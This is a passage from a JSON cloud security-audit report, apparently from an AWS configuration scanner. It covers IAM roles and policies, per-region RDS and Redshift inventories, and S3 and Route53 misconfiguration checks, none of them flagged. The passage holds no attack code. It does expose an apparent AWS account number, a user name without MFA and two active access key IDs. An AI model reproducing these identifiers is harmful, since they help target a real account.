"AROAJCHEQKY4NYQFQWP5K","name": "AWSServiceRoleForTrustedAdvisor"}]},"id": "ANPAJH4QJ2WMHBOB47BUE","name": "AWSTrustedAdvisorServiceRolePolicy"},"ANPAJSVXG6QHPE6VHDZ4Q": {"PolicyDocument": {"Statement": [{"Action": ["cloudwatch:DescribeAlarms","elasticmapreduce:ListInstanceGroups","elasticmapreduce:ModifyInstanceGroups"],"Effect": "Allow","Resource": ["*"]}],"Version": "2012-10-17"},"arn": "arn:aws:iam::aws:policy/service-role/AmazonElasticMapReduceforAutoScalingRole","attached_to": {"roles": [{"id": "AROAIH747R37LKSEOZ2MA","name": "EMR_AutoScaling_DefaultRole"}]},"id": "ANPAJSVXG6QHPE6VHDZ4Q","name": "AmazonElasticMapReduceforAutoScalingRole"}},"policies_count": 8,"roles": {"AROAI265GPNVMDZAKJPPA": {"CreateDate": "2019-01-26 09:04:06+00:00","Path": "/","arn": "arn:aws:iam::430150006394:role/EMR_EC2_DefaultRole","assume_role_policy": {"PolicyDocument": {"Statement": [{"Action": ["sts:AssumeRole"],"Effect": "Allow","Principal": {"Service": "ec2.amazonaws.com"},"Sid": ""}],"Version": "2008-10-17"}},"id": "AROAI265GPNVMDZAKJPPA","inline_policies_count": 0,"instance_profiles": {"AIPAJLM3SI3PSXMHLNA24": {"arn": "arn:aws:iam::430150006394:instance-profile/EMR_EC2_DefaultRole","name": "EMR_EC2_DefaultRole"}},"instances_count": 0,"name": "EMR_EC2_DefaultRole","policies": ["ANPAIGALS5RCDLZLB3PGS"],"policies_counts": 1},"AROAIH747R37LKSEOZ2MA": {"CreateDate": "2019-01-26 09:04:06+00:00","Path": "/","arn": "arn:aws:iam::430150006394:role/EMR_AutoScaling_DefaultRole","assume_role_policy": {"PolicyDocument": {"Statement": [{"Action": ["sts:AssumeRole"],"Effect": "Allow","Principal": {"Service": ["application-autoscaling.amazonaws.com","elasticmapreduce.amazonaws.com"]}}],"Version": "2012-10-17"}},"id": "AROAIH747R37LKSEOZ2MA","inline_policies_count": 0,"instance_profiles": {},"instances_count": 0,"name": "EMR_AutoScaling_DefaultRole","policies": ["ANPAJSVXG6QHPE6VHDZ4Q"],"policies_counts": 1},"AROAIXBSWIKGEEDLMO53I": {"CreateDate": "2019-01-26 09:04:06+00:00","Path": "/","arn": "arn:aws:iam::430150006394:role/EMR_DefaultRole","assume_role_policy": {"PolicyDocument": {"Statement": [{"Action": ["sts:AssumeRole"],"Effect": "Allow","Principal": {"Service": "elasticmapreduce.amazonaws.com"},"Sid": ""}],"Version": "2008-10-17"}},"id": "AROAIXBSWIKGEEDLMO53I","inline_policies_count": 0,"instance_profiles": {},"instances_count": 0,"name": "EMR_DefaultRole","policies": ["ANPAIDI2BQT2LKXZG36TW"],"policies_counts": 1},"AROAJ2LRZXYT2USPF2ZTY": {"CreateDate": "2019-01-26 09:04:23+00:00","Path": "/aws-service-role/elasticmapreduce.amazonaws.com/","arn": "arn:aws:iam::430150006394:role/aws-service-role/elasticmapreduce.amazonaws.com/AWSServiceRoleForEMRCleanup","assume_role_policy": {"PolicyDocument": {"Statement": [{"Action": ["sts:AssumeRole"],"Effect": "Allow","Principal": {"Service": "elasticmapreduce.amazonaws.com"}}],"Version": "2012-10-17"}},"id": "AROAJ2LRZXYT2USPF2ZTY","inline_policies_count": 0,"instance_profiles": {},"instances_count": 0,"name": "AWSServiceRoleForEMRCleanup","policies": ["ANPAI4YEZURRMKACW56EA"],"policies_counts": 1},"AROAJCHEQKY4NYQFQWP5K": {"CreateDate": "2018-08-15 22:08:26+00:00","Path": "/aws-service-role/trustedadvisor.amazonaws.com/","arn": "arn:aws:iam::430150006394:role/aws-service-role/trustedadvisor.amazonaws.com/AWSServiceRoleForTrustedAdvisor","assume_role_policy": {"PolicyDocument": {"Statement": [{"Action": ["sts:AssumeRole"],"Effect": "Allow","Principal": {"Service": "trustedadvisor.amazonaws.com"}}],"Version": "2012-10-17"}},"id": "AROAJCHEQKY4NYQFQWP5K","inline_policies_count": 0,"instance_profiles": {},"instances_count": 0,"name": "AWSServiceRoleForTrustedAdvisor","policies": ["ANPAJH4QJ2WMHBOB47BUE"],"policies_counts": 1},"AROAJCXETX2ROIWUKOPGG": {"CreateDate": "2018-08-09 19:34:27+00:00","Path": "/aws-service-role/support.amazonaws.com/","arn": "arn:aws:iam::430150006394:role/aws-service-role/support.amazonaws.com/AWSServiceRoleForSupport","assume_role_policy": {"PolicyDocument": {"Statement": [{"Action": ["sts:AssumeRole"],"Effect": "Allow","Principal": {"Service": "support.amazonaws.com"}}],"Version": "2012-10-17"}},"id": "AROAJCXETX2ROIWUKOPGG","inline_policies_count": 0,"instance_profiles": {},"instances_count": 0,"name": "AWSServiceRoleForSupport","policies": ["ANPAJ7W6266ELXF5MISDS"],"policies_counts": 1},"AROAJY5MNJYDKGD2UIATQ": {"CreateDate": "2019-01-23 17:01:24+00:00","Path": "/service-role/","arn": "arn:aws:iam::430150006394:role/service-role/load-wikipedia","assume_role_policy": {"PolicyDocument": {"Statement": [{"Action": ["sts:AssumeRole"],"Effect": "Allow","Principal": {"Service": "lambda.amazonaws.com"}}],"Version": "2012-10-17"}},"id": "AROAJY5MNJYDKGD2UIATQ","inline_policies_count": 0,"instance_profiles": {},"instances_count": 0,"name": "load-wikipedia","policies": ["ANPAIDFYJXP7KKG7FLVWO"],"policies_counts": 1}},"roles_count": 7,"service": "iam","thread_config": {"list": 10,"parse": 20},"users": {"AIDAJUK77MEJCW5J3DWZU": {"AccessKeys": [{"AccessKeyId": "AKIAJA4OP6C7FVAIIK6A","CreateDate": "2013-12-19 09:13:40+00:00","Status": "Active","UserName": "dams"},{"AccessKeyId": "AKIAI6RSA3TKSH5RFPJQ","CreateDate": "2019-01-25 17:58:41+00:00","Status": "Active","UserName": "dams"}],"CreateDate": "2013-12-19 09:13:40+00:00","MFADevices": [],"Path": "/","arn": "arn:aws:iam::430150006394:user/dams","groups": ["devs"],"id": "AIDAJUK77MEJCW5J3DWZU","inline_policies_count": 0,"name": "dams"}},"users_count": 1},"rds": {"filters": {},"findings": {"rds-instance-backup-disabled": {"checked_items": 0,"dashboard_name": "Instances","description": "Backup disabled","flagged_items": 0,"id_suffix": "BackupRetentionPeriod","items": [],"level": "danger","path": "rds.regions.id.vpcs.id.instances.id","rationale": "N/A","service": "RDS"},"rds-instance-no-minor-upgrade": {"checked_items": 0,"dashboard_name": "Instances","description": "Auto minor version upgrade disabled","flagged_items": 0,"id_suffix": "AutoMinorVersionUpgrade","items": [],"level": "danger","path": "rds.regions.id.vpcs.id.instances.id","rationale": "N/A","service": "RDS"},"rds-instance-short-backup-retention-period": {"checked_items": 0,"dashboard_name": "Instances","description": "Short backup retention period","flagged_items": 0,"id_suffix": "BackupRetentionPeriod","items": [],"level": "warning","path": "rds.regions.id.vpcs.id.instances.id","rationale": "N/A","service": "RDS"},"rds-instance-single-az": {"checked_items": 0,"dashboard_name": "Instances","description": "Single AZ RDS instance","flagged_items": 0,"id_suffix": "MultiAZ","items": [],"level": "danger","path": "rds.regions.id.vpcs.id.instances.id","rationale": "N/A","service": "RDS"},"rds-instance-storage-not-encrypted": {"checked_items": 0,"dashboard_name": "Instances","description": "Instance storage not encrypted","flagged_items": 0,"id_suffix": "StorageEncrypted","items": [],"level": "warning","path": "rds.regions.id.vpcs.id.instances.id","rationale": "N/A","service": "RDS"},"rds-security-group-allows-all": {"checked_items": 0,"dashboard_name": "Security Groups","description": "Security group allows all IP addresses","display_path": "rds.regions.id.vpcs.id.security_groups.id","flagged_items": 0,"items": [],"level": "danger","path": "rds.regions.id.vpcs.id.security_groups.id.ip_ranges","rationale": "N/A","service": "RDS"},"rds-snapshot-public": {"checked_items": 0,"dashboard_name": "Snapshots","description": "Publicly accessible snapshot","display_path": "rds.regions.id.vpcs.id.snapshots.id","flagged_items": 0,"items": [],"level": "danger","path": "rds.regions.id.vpcs.id.snapshots.id.attributes.id","rationale": "N/A","service": "RDS"}},"instances_count": 0,"parameter_groups_count": 0,"regions": {"af-south-1": {"instances_count": 0,"parameter_groups": {},"parameter_groups_count": 0,"region": "af-south-1","security_groups": {},"security_groups_count": 0,"snapshots_count": 0,"subnet_groups_count": 0,"vpc_resource_types": ["instances","snapshots","subnet_groups"],"vpcs": {}},"ap-east-1": {"instances_count": 0,"parameter_groups": {},"parameter_groups_count": 0,"region": "ap-east-1","security_groups": {},"security_groups_count": 0,"snapshots_count": 0,"subnet_groups_count": 0,"vpc_resource_types": ["instances","snapshots","subnet_groups"],"vpcs": {}},"ap-northeast-1": {"instances_count": 0,"parameter_groups": {},"parameter_groups_count": 0,"region": "ap-northeast-1","security_groups": {"default": {"DBSecurityGroupDescription": "default","EC2SecurityGroups": [],"IPRanges": [],"OwnerId": "430150006394","arn": "arn:aws:rds:ap-northeast-1:430150006394:secgrp:default","name": "default"}},"security_groups_count": 1,"snapshots_count": 0,"subnet_groups_count": 0,"vpc_resource_types": ["instances","snapshots","subnet_groups"],"vpcs": {}},"ap-northeast-2": {"instances_count": 0,"parameter_groups": {},"parameter_groups_count": 0,"region": "ap-northeast-2","security_groups": {"default": {"DBSecurityGroupDescription": "default","EC2SecurityGroups": [],"IPRanges": [],"OwnerId": "430150006394","arn": "arn:aws:rds:ap-northeast-2:430150006394:secgrp:default","name": "default"}},"security_groups_count": 1,"snapshots_count": 0,"subnet_groups_count": 0,"vpc_resource_types": ["instances","snapshots","subnet_groups"],"vpcs": {}},"ap-northeast-3": {"instances_count": 0,"parameter_groups": {},"parameter_groups_count": 0,"region": "ap-northeast-3","security_groups": {"default": {"DBSecurityGroupDescription": "default","EC2SecurityGroups": [],"IPRanges": [],"OwnerId": "430150006394","arn": "arn:aws:rds:ap-northeast-3:430150006394:secgrp:default","name": "default"}},"security_groups_count": 1,"snapshots_count": 0,"subnet_groups_count": 0,"vpc_resource_types": ["instances","snapshots","subnet_groups"],"vpcs": {}},"ap-south-1": {"instances_count": 0,"parameter_groups": {},"parameter_groups_count": 0,"region": "ap-south-1","security_groups": {"default": {"DBSecurityGroupDescription": "default","EC2SecurityGroups": [],"IPRanges": [],"OwnerId": "430150006394","arn": "arn:aws:rds:ap-south-1:430150006394:secgrp:default","name": "default"}},"security_groups_count": 1,"snapshots_count": 0,"subnet_groups_count": 0,"vpc_resource_types": ["instances","snapshots","subnet_groups"],"vpcs": {}},"ap-southeast-1": {"instances_count": 0,"parameter_groups": {},"parameter_groups_count": 0,"region": "ap-southeast-1","security_groups": {"default": {"DBSecurityGroupDescription": "default","EC2SecurityGroups": [],"IPRanges": [],"OwnerId": "430150006394","arn": "arn:aws:rds:ap-southeast-1:430150006394:secgrp:default","name": "default"}},"security_groups_count": 1,"snapshots_count": 0,"subnet_groups_count": 0,"vpc_resource_types": ["instances","snapshots","subnet_groups"],"vpcs": {}},"ap-southeast-2": {"instances_count": 0,"parameter_groups": {},"parameter_groups_count": 0,"region": "ap-southeast-2","security_groups": {"default": {"DBSecurityGroupDescription": "default","EC2SecurityGroups": [],"IPRanges": [],"OwnerId": "430150006394","arn": "arn:aws:rds:ap-southeast-2:430150006394:secgrp:default","name": "default"}},"security_groups_count": 1,"snapshots_count": 0,"subnet_groups_count": 0,"vpc_resource_types": ["instances","snapshots","subnet_groups"],"vpcs": {}},"ca-central-1": {"instances_count": 0,"parameter_groups": {},"parameter_groups_count": 0,"region": "ca-central-1","security_groups": {"default": {"DBSecurityGroupDescription": "default","EC2SecurityGroups": [],"IPRanges": [],"OwnerId": "430150006394","arn": "arn:aws:rds:ca-central-1:430150006394:secgrp:default","name": "default"}},"security_groups_count": 1,"snapshots_count": 0,"subnet_groups_count": 0,"vpc_resource_types": ["instances","snapshots","subnet_groups"],"vpcs": {}},"eu-central-1": {"instances_count": 0,"parameter_groups": {},"parameter_groups_count": 0,"region": "eu-central-1","security_groups": {"default": {"DBSecurityGroupDescription": "default","EC2SecurityGroups": [],"IPRanges": [],"OwnerId": "430150006394","arn": "arn:aws:rds:eu-central-1:430150006394:secgrp:default","name": "default"}},"security_groups_count": 1,"snapshots_count": 0,"subnet_groups_count": 0,"vpc_resource_types": ["instances","snapshots","subnet_groups"],"vpcs": {}},"eu-north-1": {"instances_count": 0,"parameter_groups": {},"parameter_groups_count": 0,"region": "eu-north-1","security_groups": {"default": {"DBSecurityGroupDescription": "default","EC2SecurityGroups": [],"IPRanges": [],"OwnerId": "430150006394","arn": "arn:aws:rds:eu-north-1:430150006394:secgrp:default","name": "default"}},"security_groups_count": 1,"snapshots_count": 0,"subnet_groups_count": 0,"vpc_resource_types": ["instances","snapshots","subnet_groups"],"vpcs": {}},"eu-south-1": {"instances_count": 0,"parameter_groups": {},"parameter_groups_count": 0,"region": "eu-south-1","security_groups": {},"security_groups_count": 0,"snapshots_count": 0,"subnet_groups_count": 0,"vpc_resource_types": ["instances","snapshots","subnet_groups"],"vpcs": {}},"eu-west-1": {"instances_count": 0,"parameter_groups": {},"parameter_groups_count": 0,"region": "eu-west-1","security_groups": {"default": {"DBSecurityGroupDescription": "default","EC2SecurityGroups": [],"IPRanges": [],"OwnerId": "430150006394","arn": "arn:aws:rds:eu-west-1:430150006394:secgrp:default","name": "default"}},"security_groups_count": 1,"snapshots_count": 0,"subnet_groups_count": 0,"vpc_resource_types": ["instances","snapshots","subnet_groups"],"vpcs": {}},"eu-west-2": {"instances_count": 0,"parameter_groups": {},"parameter_groups_count": 0,"region": "eu-west-2","security_groups": {"default": {"DBSecurityGroupDescription": "default","EC2SecurityGroups": [],"IPRanges": [],"OwnerId": "430150006394","arn": "arn:aws:rds:eu-west-2:430150006394:secgrp:default","name": "default"}},"security_groups_count": 1,"snapshots_count": 0,"subnet_groups_count": 0,"vpc_resource_types": ["instances","snapshots","subnet_groups"],"vpcs": {}},"eu-west-3": {"instances_count": 0,"parameter_groups": {},"parameter_groups_count": 0,"region": "eu-west-3","security_groups": {"default": {"DBSecurityGroupDescription": "default","EC2SecurityGroups": [],"IPRanges": [],"OwnerId": "430150006394","arn": "arn:aws:rds:eu-west-3:430150006394:secgrp:default","name": "default"}},"security_groups_count": 1,"snapshots_count": 0,"subnet_groups_count": 0,"vpc_resource_types": ["instances","snapshots","subnet_groups"],"vpcs": {}},"me-south-1": {"instances_count": 0,"parameter_groups": {},"parameter_groups_count": 0,"region": "me-south-1","security_groups": {},"security_groups_count": 0,"snapshots_count": 0,"subnet_groups_count": 0,"vpc_resource_types": ["instances","snapshots","subnet_groups"],"vpcs": {}},"sa-east-1": {"instances_count": 0,"parameter_groups": {},"parameter_groups_count": 0,"region": "sa-east-1","security_groups": {"default": {"DBSecurityGroupDescription": "default","EC2SecurityGroups": [],"IPRanges": [],"OwnerId": "430150006394","arn": "arn:aws:rds:sa-east-1:430150006394:secgrp:default","name": "default"}},"security_groups_count": 1,"snapshots_count": 0,"subnet_groups_count": 0,"vpc_resource_types": ["instances","snapshots","subnet_groups"],"vpcs": {}},"us-east-1": {"instances_count": 0,"parameter_groups": {},"parameter_groups_count": 0,"region": "us-east-1","security_groups": {"default": {"DBSecurityGroupDescription": "default","EC2SecurityGroups": [],"IPRanges": [],"OwnerId": "430150006394","arn": "arn:aws:rds:us-east-1:430150006394:secgrp:default","name": "default"}},"security_groups_count": 1,"snapshots_count": 0,"subnet_groups_count": 0,"vpc_resource_types": ["instances","snapshots","subnet_groups"],"vpcs": {}},"us-east-2": {"instances_count": 0,"parameter_groups": {},"parameter_groups_count": 0,"region": "us-east-2","security_groups": {"default": {"DBSecurityGroupDescription": "default","EC2SecurityGroups": [],"IPRanges": [],"OwnerId": "430150006394","arn": "arn:aws:rds:us-east-2:430150006394:secgrp:default","name": "default"}},"security_groups_count": 1,"snapshots_count": 0,"subnet_groups_count": 0,"vpc_resource_types": ["instances","snapshots","subnet_groups"],"vpcs": {}},"us-west-1": {"instances_count": 0,"parameter_groups": {},"parameter_groups_count": 0,"region": "us-west-1","security_groups": {"default": {"DBSecurityGroupDescription": "default","EC2SecurityGroups": [],"IPRanges": [],"OwnerId": "430150006394","arn": "arn:aws:rds:us-west-1:430150006394:secgrp:default","name": "default"}},"security_groups_count": 1,"snapshots_count": 0,"subnet_groups_count": 0,"vpc_resource_types": ["instances","snapshots","subnet_groups"],"vpcs": {}},"us-west-2": {"instances_count": 0,"parameter_groups": {},"parameter_groups_count": 0,"region": "us-west-2","security_groups": {"default": {"DBSecurityGroupDescription": "default","EC2SecurityGroups": [],"IPRanges": [],"OwnerId": "430150006394","arn": "arn:aws:rds:us-west-2:430150006394:secgrp:default","name": "default"}},"security_groups_count": 1,"snapshots_count": 0,"subnet_groups_count": 0,"vpc_resource_types": ["instances","snapshots","subnet_groups"],"vpcs": {}}},"regions_count": 21,"resource_types": {"global": [],"region": ["security_groups","parameter_groups"],"vpc": ["instances","snapshots","subnet_groups"]},"security_groups_count": 17,"service": "rds","snapshots_count": 0,"subnet_groups_count": 0,"targets": {"first_region": [["instances","DBInstances","describe_db_instances",{},false],["security_groups","DBSecurityGroups","describe_db_security_groups",{},true],["snapshots","DBSnapshots","describe_db_snapshots",{},false],["parameter_groups","DBParameterGroups","describe_db_parameter_groups",{},false],["subnet_groups","DBSubnetGroups","describe_db_subnet_groups",{},false]],"other_regions": [["instances","DBInstances","describe_db_instances",{},false],["security_groups","DBSecurityGroups","describe_db_security_groups",{},true],["snapshots","DBSnapshots","describe_db_snapshots",{},false],["parameter_groups","DBParameterGroups","describe_db_parameter_groups",{},false],["subnet_groups","DBSubnetGroups","describe_db_subnet_groups",{},false]]},"thread_config": {"list": 10,"parse": 20}},"redshift": {"clusters_count": 0,"filters": {},"findings": {"redshift-cluster-database-not-encrypted": {"checked_items": 0,"dashboard_name": "Clusters","description": "Cluster database encryption disabled","flagged_items": 0,"id_suffix": "Encrypted","items": [],"level": "warning","path": "redshift.regions.id.vpcs.id.clusters.id","rationale": "N/A","service": "RedShift"},"redshift-cluster-no-version-upgrade": {"checked_items": 0,"dashboard_name": "Clusters","description": "Version upgrade disabled","flagged_items": 0,"id_suffix": "AllowVersionUpgrade","items": [],"level": "danger","path": "redshift.regions.id.vpcs.id.clusters.id","rationale": "N/A","service": "RedShift"},"redshift-cluster-publicly-accessible": {"checked_items": 0,"dashboard_name": "Clusters","description": "Cluster publicly accessible","flagged_items": 0,"id_suffix": "PubliclyAccessible","items": [],"level": "warning","path": "redshift.regions.id.vpcs.id.clusters.id","rationale": "N/A","service": "RedShift"},"redshift-parameter-group-logging-disabled": {"checked_items": 0,"dashboard_name": "Parameter Groups","description": "User activity logging disabled","flagged_items": 0,"id_suffix": "enable_user_activity_logging","items": [],"level": "warning","path": "redshift.regions.id.parameter_groups.id","rationale": "N/A","service": "RedShift"},"redshift-parameter-group-ssl-not-required": {"checked_items": 0,"dashboard_name": "Parameter Groups","description": "SSL not required","flagged_items": 0,"id_suffix": "require_ssl","items": [],"level": "danger","path": "redshift.regions.id.parameter_groups.id","rationale": "N/A","service": "RedShift"},"redshift-security-group-whitelists-all": {"checked_items": 0,"dashboard_name": "Security Groups","description": "Security group allows all","display_path": "redshift.regions.id.vpcs.id.security_groups.id","flagged_items": 0,"items": [],"level": "danger","path": "redshift.regions.id.vpcs.id.security_groups.id.IPRanges.id.CIDRIP","rationale": "N/A","service": "RedShift"}},"parameter_groups_count": 0,"regions": {"af-south-1": {"clusters_count": 0,"parameter_groups": {},"parameter_groups_count": 0,"region": "af-south-1","security_groups": {},"security_groups_count": 0,"vpc_resource_types": ["clusters"],"vpcs": {}},"ap-east-1": {"clusters_count": 0,"parameter_groups": {},"parameter_groups_count": 0,"region": "ap-east-1","security_groups": {},"security_groups_count": 0,"vpc_resource_types": ["clusters"],"vpcs": {}},"ap-northeast-1": {"clusters_count": 0,"parameter_groups": {},"parameter_groups_count": 0,"region": "ap-northeast-1","security_groups": {},"security_groups_count": 0,"vpc_resource_types": ["clusters"],"vpcs": {}},"ap-northeast-2": {"clusters_count": 0,"parameter_groups": {},"parameter_groups_count": 0,"region": "ap-northeast-2","security_groups": {},"security_groups_count": 0,"vpc_resource_types": ["clusters"],"vpcs": {}},"ap-northeast-3": {"clusters_count": 0,"parameter_groups": {},"parameter_groups_count": 0,"region": "ap-northeast-3","security_groups": {},"security_groups_count": 0,"vpc_resource_types": ["clusters"],"vpcs": {}},"ap-south-1": {"clusters_count": 0,"parameter_groups": {},"parameter_groups_count": 0,"region": "ap-south-1","security_groups": {},"security_groups_count": 0,"vpc_resource_types": ["clusters"],"vpcs": {}},"ap-southeast-1": {"clusters_count": 0,"parameter_groups": {},"parameter_groups_count": 0,"region": "ap-southeast-1","security_groups": {},"security_groups_count": 0,"vpc_resource_types": ["clusters"],"vpcs": {}},"ap-southeast-2": {"clusters_count": 0,"parameter_groups": {},"parameter_groups_count": 0,"region": "ap-southeast-2","security_groups": {},"security_groups_count": 0,"vpc_resource_types": ["clusters"],"vpcs": {}},"ca-central-1": {"clusters_count": 0,"parameter_groups": {},"parameter_groups_count": 0,"region": "ca-central-1","security_groups": {},"security_groups_count": 0,"vpc_resource_types": ["clusters"],"vpcs": {}},"eu-central-1": {"clusters_count": 0,"parameter_groups": {},"parameter_groups_count": 0,"region": "eu-central-1","security_groups": {},"security_groups_count": 0,"vpc_resource_types": ["clusters"],"vpcs": {}},"eu-north-1": {"clusters_count": 0,"parameter_groups": {},"parameter_groups_count": 0,"region": "eu-north-1","security_groups": {},"security_groups_count": 0,"vpc_resource_types": ["clusters"],"vpcs": {}},"eu-south-1": {"clusters_count": 0,"parameter_groups": {},"parameter_groups_count": 0,"region": "eu-south-1","security_groups": {},"security_groups_count": 0,"vpc_resource_types": ["clusters"],"vpcs": {}},"eu-west-1": {"clusters_count": 0,"parameter_groups": {},"parameter_groups_count": 0,"region": "eu-west-1","security_groups": {},"security_groups_count": 0,"vpc_resource_types": ["clusters"],"vpcs": {}},"eu-west-2": {"clusters_count": 0,"parameter_groups": {},"parameter_groups_count": 0,"region": "eu-west-2","security_groups": {},"security_groups_count": 0,"vpc_resource_types": ["clusters"],"vpcs": {}},"eu-west-3": {"clusters_count": 0,"parameter_groups": {},"parameter_groups_count": 0,"region": "eu-west-3","security_groups": {},"security_groups_count": 0,"vpc_resource_types": ["clusters"],"vpcs": {}},"me-south-1": {"clusters_count": 0,"parameter_groups": {},"parameter_groups_count": 0,"region": "me-south-1","security_groups": {},"security_groups_count": 0,"vpc_resource_types": ["clusters"],"vpcs": {}},"sa-east-1": {"clusters_count": 0,"parameter_groups": {},"parameter_groups_count": 0,"region": "sa-east-1","security_groups": {},"security_groups_count": 0,"vpc_resource_types": ["clusters"],"vpcs": {}},"us-east-1": {"clusters_count": 0,"parameter_groups": {},"parameter_groups_count": 0,"region": "us-east-1","security_groups": {},"security_groups_count": 0,"vpc_resource_types": ["clusters"],"vpcs": {}},"us-east-2": {"clusters_count": 0,"parameter_groups": {},"parameter_groups_count": 0,"region": "us-east-2","security_groups": {},"security_groups_count": 0,"vpc_resource_types": ["clusters"],"vpcs": {}},"us-west-1": {"clusters_count": 0,"parameter_groups": {},"parameter_groups_count": 0,"region": "us-west-1","security_groups": {},"security_groups_count": 0,"vpc_resource_types": ["clusters"],"vpcs": {}},"us-west-2": {"clusters_count": 0,"parameter_groups": {},"parameter_groups_count": 0,"region": "us-west-2","security_groups": {},"security_groups_count": 0,"vpc_resource_types": ["clusters"],"vpcs": {}}},"regions_count": 21,"resource_types": {"global": [],"region": ["parameter_groups","security_groups"],"vpc": ["clusters"]},"security_groups_count": 0,"service": "redshift","targets": {"first_region": [["clusters","Clusters","describe_clusters",{},false],["parameter_groups","ParameterGroups","describe_cluster_parameter_groups",{},false],["security_groups","ClusterSecurityGroups","describe_cluster_security_groups",{},true]],"other_regions": [["clusters","Clusters","describe_clusters",{},false],["parameter_groups","ParameterGroups","describe_cluster_parameter_groups",{},false],["security_groups","ClusterSecurityGroups","describe_cluster_security_groups",{},true]]},"thread_config": {"list": 10,"parse": 20}},"route53": {"domains": {},"domains_count": 0,"filters": {},"findings": {"route53-domain-no-autorenew": {"checked_items": 0,"dashboard_name": "Domains","description": "Domain not set to autorenew","flagged_items": 0,"id_suffix": "AutoRenew","items": [],"level": "danger","path": "route53.domains.id","rationale": "N/A","service": "Route53"},"route53-domain-no-transferlock": {"checked_items": 0,"dashboard_name": "Domains","description": "Domain transfer not locked","flagged_items": 0,"id_suffix": "TransferLock","items": [],"level": "danger","path": "route53.domains.id","rationale": "N/A","service": "Route53"},"route53-domain-transferlock-not-authorized": {"checked_items": 0,"dashboard_name": "Domains","description": "Domain transfer lock not supported by TLD","flagged_items": 0,"id_suffix": "TransferLockNotAuthorized","items": [],"level": "danger","path": "route53.domains.id","rationale": "","service": "Route53"}},"hosted_zones": {},"hosted_zones_count": 0,"service": "route53domains","thread_config": {"list": 10,"parse": 20}},"s3": {"buckets": {},"buckets_count": 0,"filters": {"s3-bucket-website-enabled": {"checked_items": 0,"dashboard_name": "Buckets","description": "Bucket with static website enabled","flagged_items": 0,"id_suffix": "web_hosting","items": [],"level": "","path": "s3.buckets.id","rationale": "N/A","service": "S3"}},"findings": {"s3-bucket-AllUsers-read": {"checked_items": 0,"dashboard_name": "Bucket ACLs","description": "Bucket world-listable (anonymous)","display_path": "s3.buckets.id","flagged_items": 0,"id_suffix": "read","items": [],"level": "warning","path": "s3.buckets.id.grantees.id","rationale": "N/A","service": "S3"},"s3-bucket-AllUsers-read_acp": {"checked_items": 0,"dashboard_name": "Bucket ACLs","description": "Bucket's permissions world-readable (anonymous)","display_path": "s3.buckets.id","flagged_items": 0,"id_suffix": "read_acp","items": [],"level": "warning","path": "s3.buckets.id.grantees.id","rationale": "N/A","service": "S3"},"s3-bucket-AllUsers-write": {"checked_items": 0,"dashboard_name": "Bucket ACLs","description": "Bucket world-writable (anonymous)","display_path": "s3.buckets.id","flagged_items": 0,"id_suffix": "write","items": [],"level": "danger","path": "s3.buckets.id.grantees.id","rationale": "N/A","service": "S3"},"s3-bucket-AllUsers-write_acp": {"checked_items": 0,"dashboard_name": "Bucket ACLs","description": "Bucket's permissions world-writable (anonymous)","display_path": "s3.buckets.id","flagged_items": 0,"id_suffix": "write_acp","items": [],"level": "danger","path": "s3.buckets.id.grantees.id","rationale": "N/A","service": "S3"},"s3-bucket-AuthenticatedUsers-read": {"checked_items": 0,"dashboard_name": "Bucket ACLs","description": "Bucket world-listable","display_path": "s3.buckets.id","flagged_items": 0,"id_suffix": "read","items": [],"level": "danger","path": "s3.buckets.id.grantees.id","rationale": "N/A","service": "S3"},"s3-bucket-AuthenticatedUsers-read_acp": {"checked_items": 0,"dashboard_name": "Bucket ACLs","description": "Bucket's permissions world-readable","display_path": "s3.buckets.id","flagged_items": 0,"id_suffix": "read_acp","items": [],"level": "warning","path": "s3.buckets.id.grantees.id","rationale": "N/A","service": "S3"},"s3-bucket-AuthenticatedUsers-write": {"checked_items": 0,"dashboard_name": "Bucket ACLs","description": "Bucket world-writable","display_path": "s3.buckets.id","flagged_items": 0,"id_suffix": "write","items": [],"level": "danger","path": "s3.buckets.id.grantees.id","rationale": "N/A","service": "S3"},"s3-bucket-AuthenticatedUsers-write_acp": {"checked_items": 0,"dashboard_name": "Bucket ACLs","description": "Bucket's permissions world-writable","display_path": "s3.buckets.id","flagged_items": 0,"id_suffix": "write_acp","items": [],"level": "danger","path": "s3.buckets.id.grantees.id","rationale": "N/A","service": "S3"},"s3-bucket-allowing-cleartext": {"checked_items": 0,"dashboard_name": "Buckets","description": "Bucket allowing clear text (HTTP) communication","flagged_items": 0,"id_suffix": "secure_transport","items": [],"level": "warning","path": "s3.buckets.id","rationale": "If HTTPS is not enforced on the bucket policy, communication between clients and S3 buckets can use unencrypted HTTP. As a result, sensitive information could be transmitted in clear text over the network|Internet.","service": "S3"},"s3-bucket-no-default-encryption": {"checked_items": 0,"dashboard_name": "Buckets","description": "Bucket without default encryption enabled","flagged_items": 0,"id_suffix": "default_encryption","items": [],"level": "warning","path": "s3.buckets.id","rationale": "N/A","service": "S3"},"s3-bucket-no-logging": {"checked_items": 0,"dashboard_name": "Buckets","description": "Bucket access logging disabled","flagged_items": 0,"id_suffix": "logging","items": [],"level": "warning","path": "s3.buckets.id","rationale": "N/A","service": "S3"},"s3-bucket-no-mfa-delete": {"checked_items": 0,"dashboard_name": "Buckets","description": "Versioned bucket without MFA delete","flagged_items": 0,"id_suffix": "mfa_delete","items": [],"level": "warning","path": "s3.buckets.id","rationale": "N/A","service": "S3"},"s3-bucket-no-versioning": {"checked_items": 0,"dashboard_name": "Buckets","description": "Bucket without versioning","flagged_items": 0,"id_suffix": "versioning","items": [],"level": "warning","path": "s3.buckets.id","rationale": "N/A","service": "S3"},"s3-bucket-world-Delete-policy": {"checked_items": 0,"dashboard_name": "Buckets","description": "Delete actions authorized to all principals","display_path": "s3.buckets.id","flagged_items": 0,"items": [],"level": "danger","path": "s3.buckets.id.policy.Statement.id","rationale": "N/A","service": "S3"},"s3-bucket-world-Get-policy": {"checked_items": 0,"dashboard_name": "Buckets","description": "Get actions authorized to all principals","display_path": "s3.buckets.id","flagged_items": 0,"items": [],"level": "danger","path": "s3.buckets.id.policy.Statement.id","rationale": "N/A","service": "S3"},"s3-bucket-world-List-policy": {"checked_items": 0,"dashboard_name": "Buckets","description": "List actions authorized to all principals","display_path": "s3.buckets.id","flagged_items": 0,"items": [],"level": "danger","path": "s3.buckets.id.policy.Statement.id","rationale": "N/A","service": "S3"},"s3-bucket-world-Manage-policy": {"checked_items": 0,"dashboard_name": "Buckets","description": "Manage actions authorized to all principals","display_path": "s3.buckets.id","flagged_items": 0,"items": [],"level": "danger","path": "s3.buckets.id.policy.Statement.id","rationale": "N/A","service": "S3"},"s3-bucket-world-Put-policy": {"checked_items": 0,"dashboard_name": 